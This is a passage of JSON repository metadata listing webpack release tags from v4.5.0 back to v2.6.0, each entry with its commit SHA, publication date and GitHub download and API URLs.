ack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html